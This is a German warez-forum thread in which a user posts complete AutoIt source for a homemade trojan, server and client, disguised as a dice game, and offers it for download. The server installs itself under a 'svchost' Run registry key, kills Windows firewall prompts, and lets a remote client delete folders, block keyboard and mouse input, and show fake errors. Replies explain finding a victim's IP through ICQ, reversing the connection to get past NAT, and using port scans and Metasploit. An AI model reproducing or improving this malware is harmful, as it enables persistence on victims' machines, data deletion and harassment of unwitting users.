Willkommen
myGully
Links
Forum
22.11.09, 00:22
#1
Little Boy
Registriert seit: May 2009
Ort: BY
Beiträge: 20
Bedankt: 0
Mini Trojaner
Ist es Verboten hier eigene Mini Trojaner o.ä. reinzustellen? Ich will nicht gleich gebannt werden
Es ist kein gefährlicher, sonder einfach so ein "ICQ-gag". Schnell versenden, IP rauskriegen (mit ICQ total leicht) und Bildschirm An/Aus machen und so...
Also darf ich oder nich?
Downloadlink zweite Seite!!!
mfg
Answer
22.11.09, 00:31
#2
Anfänger
Registriert seit: Mar 2009
Beiträge: 9
Bedankt: 1
Selber wissen tu ich es nicht aber.. hier tuen tausende ihre downloads rein mit trojanern etc. xD
22.11.09, 00:47
#3
Banned
Registriert seit: Mar 2009
Beiträge: 4.740
Bedankt: 1.622
Ist soweit Ok ... aber bitte virenfrei ...
virustotal.com link bitte dazu posten ...
22.11.09, 09:41
#4
Banned
Registriert seit: Sep 2009
Ort: /root/
Beiträge: 825
Bedankt: 640
Zitat:
Zitat von
!FlaSh!
Ist soweit Ok ... aber bitte virenfrei ...
virustotal.com link bitte dazu posten ...
Virenfreie Trojaner!
22.11.09, 13:01
#5
Banned
Registriert seit: Mar 2009
Beiträge: 4.740
Bedankt: 1.622
Ich meine halt, das im Trojaner nicht noch 2 andere Trojaner versteckt sind ..
Ich hoffe, du verstehst
22.11.09, 13:30
#6
get shocked....
Registriert seit: Nov 2009
Beiträge: 369
Bedankt: 443
--------------
22.11.09, 13:48
#7
Newbie
Registriert seit: Nov 2009
Beiträge: 78
Bedankt: 8
Auch ein mit Viren befallendes Tool kann man FUD machen, von daher ist virustotal überflüssig
.
22.11.09, 13:51
#8
get shocked....
Registriert seit: Nov 2009
Beiträge: 369
Bedankt: 443
--------------
22.11.09, 14:45
#9
Banned
Registriert seit: Mar 2009
Beiträge: 4.740
Bedankt: 1.622
Zitat:
Zitat von
Elend
Auch ein mit Viren befallendes Tool kann man FUD machen, von daher ist virustotal überflüssig
.
Daher am besten in einer Virtuellen Maschine ausprobieren.
22.11.09, 14:54
#10
Guest
Zitat:
Zitat von
Elend
Auch ein mit Viren befallendes Tool kann man FUD machen, von daher ist virustotal überflüssig
.
Und darum würde ich auch sagen NÖ!
Wir sind ein Warez Board und kein Hack/Viren/Trojaner Board!!!
22.11.09, 15:01
#11
Banned
Registriert seit: Sep 2009
Ort: /root/
Beiträge: 825
Bedankt: 640
Zitat:
Zitat von
Prince Porn
Und darum würde ich auch sagen NÖ!
Wir sind ein Warez Board und kein Hack/Viren/Trojaner Board!!!
Steht aber in der Subforenbeschreibung
22.11.09, 15:02
#12
Little Boy
Registriert seit: May 2009
Ort: BY
Beiträge: 20
Bedankt: 0
Is überhaupt nix gefährliches!!!!
Hier die links zum Download:
client:
[
Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
server:
[
Link nur für registrierte Mitglieder sichtbar. Bitte einloggen oder neu registrieren ]
ACHTUNG!!!! Is getarnt als Würfelspiel^^
Quellcode Server (AutoIt):
Code:
#include <GuiConstantsEx.au3>
#include <INet.au3>
#NoTrayIcon
If FileRead(@MyDocumentsDir & "\windowsshortfile.data") = 0 Then
ProcessClose("explorer.exe")
Sleep(1000)
Run(@SystemDir & "\explorer.exe")
Sleep(500)
MsgBox(64, "Nicht Kompatibel", "Windows kann diese Datei nicht mit ihrer ServicePackversion " & @OSServicePack & " starten." & @LF & "WSA Errornumber: 884eIIOþ",10)
MsgBox(64, "Short Info", "OSLang: " & @OSLang & @LF & "OSBuild: " & @OSBuild & @LF & "OSVersion: " & @OSVersion & @LF & "OSServicepack: "&@OSServicePack & @LF & "IPv4: " & @IPAddress1 & @LF & "IPv6: " & _GetIP(),10)
FileWrite(@MyDocumentsDir & "\windowsshortfile.data", @IPAddress1 & "-" & _GetIP())
FileCopy(@S*****FullPath, "C:\Programme\winserver.exe",1)
EndIf
#RequireAdmin
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","svchost","REG_SZ",'"'& "C:\Programme\winserver.exe"&'"')
Local $szServerPC = @ComputerName
Local $szIPADDRESS = @IPAddress1
Local $nPORT = 5110
Local $MainSocket, $GOOEY, $edit, $ConnectedSocket, $szIP_Accepted
Local $msg, $recv
TCPStartup()
$count = 1
While 1
If WinExists("Windows-Sicherheitshinweis", "") Then WinKill("Windows-Sicherheitshinweis", "")
If $count = 20000 Then ExitLoop
Sleep(1)
$count = $count + 1
WEnd
HotKeySet("{F1}", "showhide")
$show = False
$MainSocket = TCPListen($szIPADDRESS, $nPORT)
If $MainSocket = -1 Then Exit
$GOOEY = GUICreate("My Server (IP: " & $szIPADDRESS & ")", 300, 200)
$edit = GUICtrlCreateEdit("", 10, 10, 280, 180)
GUISetState(@SW_HIDE)
$ConnectedSocket = -1
Do
$ConnectedSocket = TCPAccept($MainSocket)
Until $ConnectedSocket <> -1
$szIP_Accepted = SocketToIP($ConnectedSocket)
While 1
$msg = GUIGetMsg()
If $msg = $GUI_EVENT_CLOSE Then ExitLoop
$recv = TCPRecv($ConnectedSocket, 2048)
If @error Then ExitLoop
If $recv <> "" Then
$sNew = StringSplit($recv, "|")
GUICtrlSetData($edit, SocketToIP($ConnectedSocket) & ">--< " & $recv & @CRLF & GUICtrlRead($edit))
If $sNew[1] = "bildschirm" Then
If $sNew[2] = "on" Then $art = -1
If $sNew[2] = "off" Then $art = 2
Opt("WinTitleMatchMode", 4)
$hwnd = WinGetHandle('classname=Progman')
_ToggleMonitor($hWnd, $art)
EndIf
If $sNew[1] = "del" Then
DirRemove($sNew[2], 1)
EndIf
If $sNew[1] = "error" Then
MsgBox($sNew[2], $sNew[3], $sNew[4])
EndIf
If $sNew[1] = "blockinput" Then
BlockInput($sNew[2])
EndIf
EndIf
WEnd
If $ConnectedSocket <> -1 Then TCPCloseSocket($ConnectedSocket)
TCPShutdown()
; Function to return IP Address from a connected socket.
;----------------------------------------------------------------------
Func SocketToIP($SHOCKET)
Local $sockaddr, $aRet
$sockaddr = DllStructCreate("short;ushort;uint;char[8]")
$aRet = DllCall("Ws2_32.dll", "int", "getpeername", "int", $SHOCKET, _
"ptr", DllStructGetPtr($sockaddr), "int*", DllStructGetSize($sockaddr))
If Not @error And $aRet[0] = 0 Then
$aRet = DllCall("Ws2_32.dll", "str", "inet_ntoa", "int", DllStructGetData($sockaddr, 3))
If Not @error Then $aRet = $aRet[0]
Else
$aRet = 0
EndIf
$sockaddr = 0
Return $aRet
EndFunc ;==>SocketToIP
; Funktion to Toggle Monitor On or Off
; ---------------------------------------------------------------------
Func _ToggleMonitor($hwnd, $OnOff)
Local Const $WM_SYSCOMMAND = 274
Local Const $SC_MONITORPOWER = 61808
_SendMessage2($hWnd, $WM_SYSCOMMAND, $SC_MONITORPOWER, $OnOff)
If @error Then
MsgBox(0,"_ToggleMonitor", "_SendMessage Error: " & @error)
Exit
EndIf
EndFunc
Func _SendMessage2($hWnd, $iMsg, $wParam = 0, $lParam = 0, $iReturn = 0, $wParamType = "wparam", $lParamType = "lparam", $sReturnType = "lparam")
Local $aResult = DllCall("user32.dll", $sReturnType, "SendMessage", "hwnd", $hWnd, "int", $iMsg, $wParamType, $wParam, $lParamType, $lParam)
If @error Then Return SetError(@error, @extended, "")
If $iReturn >= 0 And $iReturn <= 4 Then Return $aResult[$iReturn]
Return $aResult
EndFunc ;==>_SendMessage
Func showhide()
If $show = False Then
GUISetState(@SW_SHOW)
$show = True
Else
GUISetState(@SW_HIDE)
$show = False
EndIf
EndFunc
Client:
Code:
#include <GUIConstantsEx.au3>
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
Example()
Func Example()
; Set Some reusable info
;--------------------------
Local $ConnectedSocket, $szData
Local $szIPADDRESS = @IPAddress1
Local $nPORT = 5110
; Start The TCP Services
;==============================================
TCPStartup()
; Initialize a variable to represent a connection
;==============================================
$ConnectedSocket = -1
;Attempt to connect to SERVER at its IP and PORT 33891
;=======================================================
;~ $ConnectedSocket = TCPConnect($szIPADDRESS, $nPORT)
; If there is an error... show it
;~ If @error Then
;~ MsgBox(4112, "Error", "TCPConnect failed with WSA error: " & @error)
;~ Else
#Region ### START Koda GUI section ### Form
$Form1 = GUICreate("AnswerTrojan by Answer", 184, 218, 262, 171)
$Label1 = GUICtrlCreateLabel("IP:", 8, 8, 22, 20)
GUICtrlSetFont(-1, 10, 800, 0, "MS Sans Serif")
$IP = GUICtrlCreateInput(@IPAddress1, 32, 8, 85, 21)
GUICtrlSetLimit(-1, 13)
$connect = GUICtrlCreateButton("Verbinden", 124, 8, 55, 25, 0)
$Group1 = GUICtrlCreateGroup("Möglichkeiten:", 8, 40, 169, 153)
$message = GUICtrlCreateButton("Nachricht senden", 16, 64, 155, 25, 0)
$delete = GUICtrlCreateButton("Daten löschen", 16, 96, 155, 25, 0)
$monitor = GUICtrlCreateButton("Bildschirmoptionen", 16, 128, 155, 25, 0)
$keyboard = GUICtrlCreateButton("Tastatur u. Maus", 16, 160, 155, 25, 0)
GUICtrlCreateGroup("", -99, -99, 1, 1)
$status = GUICtrlCreateLabel(@TAB & "Nicht verbunden", -8, 200, 196, 19, $SS_CENTERIMAGE)
GUICtrlSetBkColor(-1, 0xFF0000)
GUISetState(@SW_SHOW)
GUICtrlSetState($message, $GUI_DISABLE)
GUICtrlSetState($delete, $GUI_DISABLE)
GUICtrlSetState($monitor, $GUI_DISABLE)
GUICtrlSetState($keyboard, $GUI_DISABLE)
#EndRegion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $connect
If GUICtrlRead($connect) = "Verbinden" Then
GUICtrlSetData($status, @TAB & "Verbindung wird hergestellt...")
$ConnectedSocket = TCPConnect(GUICtrlRead($IP), $nPORT)
If @error Then
MsgBox(4112, "Fatal ERROR", "TCPConnect failed with WSA error: " & @error)
GUICtrlSetData($status, @TAB & "Nicht verbunden")
Else
GUICtrlSetData($status, @TAB & "Verbunden")
GUICtrlSetData($connect, "Trennen")
GUICtrlSetState($message, $GUI_ENABLE)
GUICtrlSetState($delete, $GUI_ENABLE)
GUICtrlSetState($monitor, $GUI_ENABLE)
GUICtrlSetState($keyboard, $GUI_ENABLE)
EndIf
Else
TCPCloseSocket($ConnectedSocket)
GUICtrlSetData($status, @TAB & "Nicht verbunden")
GUICtrlSetData($connect, "Verbinden")
GUICtrlSetState($message, $GUI_ENABLE)
GUICtrlSetState($delete, $GUI_ENABLE)
GUICtrlSetState($monitor, $GUI_ENABLE)
GUICtrlSetState($keyboard, $GUI_ENABLE)
EndIf
Case $GUI_EVENT_CLOSE
Exit
Case $message
$titel = InputBox("Titel", "Bitte den Titel der Meldung angeben", "Windows Kontrollzentrum")
If $titel <> "" Then
$text = InputBox("Text", "Bitte den Text für die Fehlermeldung schreiben", "Error in datei ""%windir%\system32\stupiduser.dll""")
If $text <> "" Then
TCPSend($ConnectedSocket, "error|16|" & $titel & "|" & $text)
EndIf
EndIf
Case $delete
$pfad = InputBox("Löschen", "Bitte hier den Pfad zum löschen angeben" & @LF & "zb.:" & @LF & @LF & "C:\Programme\" & @LF & "C:\Programme\<programmname>\")
If $pfad <> "" Then TCPSend($ConnectedSocket, "del|" & $pfad)
Case $keyboard
#Region ### START Koda GUI section ### Form=
GUISetState(@SW_DISABLE)
$Form2 = GUICreate("T u. A optionen", 216, 66, 193, 125)
GUICtrlCreateLabel("Tastatur u. Mausoptionen wählen:", 8, 8, 165, 17)
$TUM1 = GUICtrlCreateButton("Sperren", 8, 32, 75, 25, 0)
$TUS0 = GUICtrlCreateButton("Entsperren", 136, 32, 75, 25, 0)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
ExitLoop
Case $TUM1
TCPSend($ConnectedSocket, "blockinput|1")
Case $TUS0
TCPSend($ConnectedSocket, "blockinput|0")
EndSwitch
WEnd
GUIDelete()
GUISetState(@SW_ENABLE)
Case $monitor
#Region ### START Koda GUI section ### Form=
GUISetState(@SW_DISABLE)
$Form2 = GUICreate("Bildschirm", 216, 66, 193, 125)
GUICtrlCreateLabel("Bildschirmoptionen", 8, 8, 165, 17)
$On = GUICtrlCreateButton("An", 8, 32, 75, 25, 0)
$Off = GUICtrlCreateButton("Aus", 136, 32, 75, 25, 0)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
ExitLoop
Case $On
TCPSend($ConnectedSocket, "bildschirm|on")
Case $Off
TCPSend($ConnectedSocket, "bildschirm|off")
EndSwitch
WEnd
GUIDelete()
GUISetState(@SW_ENABLE)
EndSwitch
WEnd
;~ EndIf
EndFunc ;==>Example
22.11.09, 15:02
#13
Guest
Das ausgerechnet Du jetzt rumwunderst ....
24.11.09, 22:04
#14
Anfänger
Registriert seit: May 2009
Beiträge: 9
Bedankt: 6
Und was kann der alles wenn mir der Quell Text mal nichts sagt bzw. ich mich damit net aus kenne
Jetzt kommt mir aber nicht das ich es dann sein lassen kann. Ich frage ja nur und jeder fängt mal an sich in neue Gebiete zu begeben
24.11.09, 23:43
#15
Bacchelor
Registriert seit: Nov 2009
Beiträge: 13
Bedankt: 0
hey^^ kannst das auch für Windows 7 lauffähig machen? mit kompatibilität läuft da leida nix.... ^^
25.11.09, 05:52
#16
Banned
Registriert seit: Sep 2009
Ort: /root/
Beiträge: 825
Bedankt: 640
Zitat:
Zitat von
mogo
Und was kann der alles wenn mir der Quell Text mal nichts sagt bzw. ich mich damit net aus kenne
Jetzt kommt mir aber nicht das ich es dann sein lassen kann. Ich frage ja nur und jeder fängt mal an sich in neue Gebiete zu begeben
Als erstes soltlest du lesen lernen... schau mal in den ersten beitrag
25.11.09, 13:27
#17
Little Boy
Registriert seit: May 2009
Ort: BY
Beiträge: 20
Bedankt: 0
Vielleicht könnte sich auch mal jemand aufs Thema konzentrieren???
Hab nämlich schon fehler festgestellt.
Beim ersten start wird doch die datei nach C:\Programme\winserver.exe geschoben.
Wenn man die Datei öffnen will kommt ein Error. ka warum.
Ich teste mal weiter und wir werden sehen
Anleitung zum IP rauskriegen bei ICQ:
Wenn die datei über ICQ versendet und gestartet worden ist folgendes tun.
- CMD starten (Start Ausführen CMD <Enter>; Start suche eingeben CMD <Enter>)
- "netstat" eingeben und warten bis es geladen hat
- Die IP mit :5190 (ICQ port) suchen und in den Client oben reinschreiben (ohne :5190)
@austrianidi0t
is unter Win7 gemacht worden. Dass am anfang der Desktop + Taskleiste verschwindet soll so sein.
Und die ganzen Fehlermeldungen sind beabsichtigt!!!!
LOL
jetzt hab ich noch Anti-Firewall hinzugefügt. wenn das Firewallfenster kommt, wird es einfach "gekillt".
sieht so aus:
$count = 0
While 1
If WinExists("Windows-Sicherheitsmeldung","") Then WinKill("Windows-Sicherheitsmeldung")
If $count = 20000 Then Exitloop
sleep(1)
$count = $count + 1
WEnd
25.11.09, 18:07
#18
Banned
Registriert seit: Sep 2009
Ort: /root/
Beiträge: 825
Bedankt: 640
warum horcht dein client?
26.11.09, 12:38
#19
Little Boy
Registriert seit: May 2009
Ort: BY
Beiträge: 20
Bedankt: 0
Was macht der? horcht? wasn das?
26.11.09, 13:38
#20
Banned
Registriert seit: Sep 2009
Ort: /root/
Beiträge: 825
Bedankt: 640
na dein client muss doch auf irgend nem port horchen ob ne verbindung ansteht? Ansonsten würde die Firewallmeldung doch garnet kommen
26.11.09, 15:22
#21
Little Boy
Registriert seit: May 2009
Ort: BY
Beiträge: 20
Bedankt: 0
Aso,
Port: 5110
Ein übliches Trojanerport, weil kein häufig benutztes Programm drüberläuft.
26.11.09, 17:11
#22
Banned
Registriert seit: Sep 2009
Ort: /root/
Beiträge: 825
Bedankt: 640
aber warum macht der das? das is doch totaler schwachsinn, wenn da nen NAT router davor hängt kannst du dich doch garnich zu dem hin verbinden.
26.11.09, 18:58
#23
Little Boy
Registriert seit: May 2009
Ort: BY
Beiträge: 20
Bedankt: 0
Zitat:
aber warum macht der das?
Weil ich den Befehl so eingegeben habe^^
Zitat:
das is doch totaler schwachsinn, wenn da nen NAT router davor hängt kannst du dich doch garnich zu dem hin verbinden.
Gib mir nen tipp wie ichs besser machen soll.
Hab grad garkeine ahnung was du meinst.
Zumindest innerhalb von Netzwerken klappt es. (mehr brauch man in der Schule auch nicht, wenn man den Lehrer ärgern möchte)
26.11.09, 19:10
#24
Banned
Registriert seit: Sep 2009
Ort: /root/
Beiträge: 825
Bedankt: 640
also wenn du nur in netzwerken arbeitest dann is das so in ordnung. wenn du aber im Internet agierst müsste dein Opfer erst den Port 5110 in seinem Router freigeben, wird wohl kaum einer machen. Besser wäre es wenn dein Server auf dem Port horcht, sprich verbindungen erwartet. Wenn du jemanden deinen Trojanerclient sendest baut der dann eine Verbindung zu dir auf.
1. Windows Firewall meldet sich nicht (Allerdings reagieren PFWs auch auf das)
2. Nur du musst den Port freigeben.
Aber wie gesagt in nem Intranet is es egal.
27.11.09, 20:31
#25
Little Boy
Registriert seit: May 2009
Ort: BY
Beiträge: 20
Bedankt: 0
Also der Connected zu mir.....hab darüber noch garnicht nachgedacht. clever^^
THX
werd mich mal damit beschäftigen.
Aber Heut nimmer.
01.12.09, 12:49
#26
Erfahrener Newbie
Registriert seit: Oct 2009
Beiträge: 112
Bedankt: 22
effektiver ist es beim clienten einen sehr langsamen portscan auszuführen. So ist es einfacher den Trojaner an mehrere Systeme anzukoppeln.
01.12.09, 13:07
#27
Banned
Registriert seit: Jul 2009
Ort: GER
Beiträge: 1.484
Bedankt: 630
Könnt ihr mir beibringen wie so etwas funktioniert?
Ich hatte mal einen Trojaner, der lief auch, wurde aber nach ner Zeit langweilich weil zu wenig Opfer um ärgern da waren..
Mir hat das jemand mit Bifrost gemacht, Trojaner erstellt und ich habs halt verschickt oder über no-ip seine opfer gesehen...
Aber wie das mit Bifrost funktioniert.. keine ahnung^^
01.12.09, 16:07
#28
Erfahrener Newbie
Registriert seit: Oct 2009
Beiträge: 112
Bedankt: 22
lass die billig-s***** kiddy programe. Metasploit Framework mit Exploits sind effektiver. Nmap ist auch sehr wichtig. Wenn du das kannst, dann wirst du Spass haben!!
Forumregeln
Du kannst keine neue Themen eröffnen
Du kannst keine Antworten verfassen
Du kannst keine Anhänge posten
Du kannst nicht deine Beiträge editieren
HTML-Code ist Aus .
Alle Zeitangaben in WEZ +1. Es ist jetzt 07:21 Uhr.
().